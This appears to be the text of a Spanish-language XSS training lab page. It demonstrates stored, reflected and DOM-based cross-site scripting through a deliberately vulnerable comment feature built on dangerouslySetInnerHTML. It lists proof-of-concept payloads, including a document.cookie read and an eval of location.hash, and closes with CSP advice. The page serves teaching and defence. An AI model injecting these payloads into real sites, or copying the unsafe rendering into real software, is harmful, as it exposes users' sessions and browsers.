Laboratorio avanzado para explorar y dominar técnicas de Cross-Site Scripting
⚡ ENTORNO DE EXPLOTACIÓN XSS AVANZADO
El modo "Vulnerable" ejecutará cualquier código JavaScript en los comentarios. Esto simula una vulnerabilidad real de XSS.
Welcome to our site!
<script>alert("Stored XSS")</script>This is a normal comment
<img src="x" onerror="alert('Image XSS')" /><script>alert('XSS')</script><img src="x" onerror="alert('XSS')" /><svg onload="alert('XSS')" /><iframe src="javascript:alert('XSS')" /><body onload="alert('XSS')" /><input onfocus="alert('XSS')" autofocus />El payload malicioso se almacena persistentemente en la base de datos y se ejecuta cada vez que cualquier usuario carga la página.
🔥 Nivel de Peligro: CRÍTICO - Afecta a todos los usuarios que visiten la página
<script>alert('XSS')</script><img src=x onerror=alert(1)>El payload se refleja inmediatamente en la respuesta HTTP sin ser almacenado permanentemente.
⚡ Vector común: Parámetros URL, formularios de búsqueda
javascript:alert(document.cookie)<svg onload=alert(1)>El payload se ejecuta modificando el DOM del lado del cliente sin interacción directa con el servidor.
🎯 Ejecutado: Completamente en el navegador del usuario
#<img src=x onerror=alert(1)>javascript:eval(location.hash.slice(1))Esta página utiliza dangerouslySetInnerHTMLque permite la ejecución de JavaScript arbitrario. En aplicaciones de producción, NUNCA uses esta función con datos no confiables.
Implementa CSP estrictas para bloquear la ejecución de scripts inline y restringir las fuentes de recursos.